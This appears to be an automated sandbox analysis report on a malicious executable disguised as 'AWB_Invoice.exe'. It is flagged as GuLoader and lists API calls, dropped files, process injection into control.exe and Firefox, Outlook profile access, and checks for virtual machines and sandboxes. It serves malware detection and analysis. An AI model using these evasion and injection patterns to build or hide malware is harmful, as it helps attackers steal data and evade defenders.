      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583E3104_2_3583E310
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EF3304_2_358EF330
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581D2EC4_2_3581D2EC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E124C4_2_358E124C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842DB04_2_35842DB0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35839DD04_2_35839DD0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CFDF44_2_358CFDF4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582AD004_2_3582AD00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EFD274_2_358EFD27
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E7D4C4_2_358E7D4C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830D694_2_35830D69
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358C9C984_2_358C9C98
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35848CDF4_2_35848CDF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B7CE84_2_358B7CE8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584FCE04_2_3584FCE0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358FACEB4_2_358FACEB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820C124_2_35820C12
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583AC204_2_3583AC20
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DEC4C4_2_358DEC4C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35833C604_2_35833C60
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E6C694_2_358E6C69
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EEC604_2_358EEC60
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EEFBF4_2_358EEFBF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E1FC64_2_358E1FC6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35836FE04_2_35836FE0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583CF004_2_3583CF00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EFF634_2_358EFF63
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E0EAD4_2_358E0EAD
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35831EB24_2_35831EB2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E9ED24_2_358E9ED2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35822EE84_2_35822EE8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35872E484_2_35872E48
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850E504_2_35850E50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358D0E6D4_2_358D0E6D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582E9A04_2_3582E9A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EE9A64_2_358EE9A6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358759C04_2_358759C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358468824_2_35846882
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 3589E692 appears 75 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 3581B910 appears 168 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 358AEF10 appears 85 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: String function: 35877BE4 appears 73 times
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358634E0 NtCreateMutant,LdrInitializeThunk,4_2_358634E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_35862DA0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_35862DC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_35862D10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862CF0 NtDelayExecution,LdrInitializeThunk,4_2_35862CF0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C30 NtMapViewOfSection,LdrInitializeThunk,4_2_35862C30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_35862C50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862F00 NtCreateFile,LdrInitializeThunk,4_2_35862F00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862EB0 NtProtectVirtualMemory,LdrInitializeThunk,4_2_35862EB0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862ED0 NtResumeThread,LdrInitializeThunk,4_2_35862ED0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E50 NtCreateSection,LdrInitializeThunk,4_2_35862E50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358629F0 NtReadFile,LdrInitializeThunk,4_2_358629F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35862B90
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_35862BC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_35862B10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862A80 NtClose,LdrInitializeThunk,4_2_35862A80
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35864570 NtSuspendThread,4_2_35864570
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35864260 NtSetContextThread,4_2_35864260
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862D50 NtWriteVirtualMemory,4_2_35862D50
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35863C90 NtOpenThread,4_2_35863C90
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862CD0 NtEnumerateKey,4_2_35862CD0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C10 NtOpenProcess,4_2_35862C10
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862C20 NtSetInformationFile,4_2_35862C20
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35863C30 NtOpenProcessToken,4_2_35863C30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862FB0 NtSetValueKey,4_2_35862FB0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862F30 NtOpenDirectoryObject,4_2_35862F30
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E80 NtCreateProcessEx,4_2_35862E80
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862EC0 NtQuerySection,4_2_35862EC0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862E00 NtQueueApcThread,4_2_35862E00
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358629D0 NtWaitForSingleObject,4_2_358629D0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibgobject-2.0-0.dll* vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000001.00000000.61805299806.0000000000570000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKubikrdders Forniklingernes.exeb! vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62379354895.0000000035AC0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000003.62227876661.00000000355A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62279050012.000000000009C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003576C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000000.62106031426.0000000000570000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKubikrdders Forniklingernes.exeb! vs AWB_Invoice.exe
      Source: AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_Invoice.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: edgegdi.dllJump to behavior
      Source: AWB_Invoice.exeStatic PE information: invalid certificate
      Source: AWB_Invoice.exeReversingLabs: Detection: 35%
      Source: AWB_Invoice.exeVirustotal: Detection: 54%
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile read: C:\Users\user\Desktop\AWB_Invoice.exeJump to behavior
      Source: AWB_Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\AWB_Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exe
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exeJump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Roaming\DORME.iniJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\nsnE69B.tmpJump to behavior
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@9/12@18/16
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_004021AA LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,1_2_004021AA
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile written: C:\Users\user\AppData\Roaming\DORME.iniJump to behavior
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: AWB_Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: control.pdb source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: AWB_Invoice.exe, AWB_Invoice.exe, 00000004.00000003.62234452698.000000003563F000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62227876661.0000000035485000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.00000000357F0000.00000040.00001000.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62379354895.000000003591D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004CFD000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62283963539.0000000004A27000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66854668230.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.62278595499.000000000487A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: control.pdbUGP source: AWB_Invoice.exe, 00000004.00000002.62279050012.0000000000090000.00000040.10000000.00040000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: firefox.pdb source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.62251220360.0000000006342000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.62249836866.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E226F7 pushad ; ret 1_2_04E22707
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E252FA push ebp; iretd 1_2_04E25304
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E252F8 push ss; ret 1_2_04E252F9
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E226DD pushad ; ret 1_2_04E22707
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E240B7 pushad ; ret 1_2_04E240BF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2649B push esp; iretd 1_2_04E264A7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2546B push edi; iretd 1_2_04E254AC
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E23A4A push F64B30A9h; ret 1_2_04E23A4F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2364E pushad ; retf 1_2_04E2364F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E2684C push edi; iretd 1_2_04E26868
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E24058 pushad ; ret 1_2_04E240BF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E24436 pushad ; retf 1_2_04E2445F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E247FD push 23172C9Dh; ret 1_2_04E24803
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E231CC pushad ; ret 1_2_04E23203
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E25DDD pushfd ; ret 1_2_04E25DEB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_04E22F83 push cs; ret 1_2_04E22F86
      Source: NMDllHost.exe.1.drStatic PE information: section name: .shared
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_6F612351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F612351
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\gobject-2.0.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\nscE6F9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\BtvStack.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 7608Thread sleep count: 119 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 7608Thread sleep time: -238000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep time: -45000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep count: 35 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2364Thread sleep time: -35000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\gobject-2.0.dllJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\Repressive\Parthavernes\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Barpost\Forstvn\BtvStack.exeJump to dropped file
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 rdtsc 4_2_35861763
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI coverage: 1.3 %
      Source: C:\Windows\SysWOW64\control.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI call chain: ExitProcess graph end nodegraph_1-4715
      Source: C:\Users\user\Desktop\AWB_Invoice.exeAPI call chain: ExitProcess graph end nodegraph_1-4871
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: noreply@vmware.com0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: http://www.vmware.com/0
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.1!0
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231910856.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66849658014.0000000002F29000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66863328196.000000000787E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63598041200.000000001067E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.66892389836.0000000010682000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63642983383.0000000010681000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.1
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMware, Inc.0
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052F7000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231910856.00000000052F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.0000000005298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: AWB_Invoice.exe, 00000001.00000002.62328916748.0000000008A79000.00000004.00000800.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: AWB_Invoice.exe, 00000004.00000002.62365938253.0000000006EF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
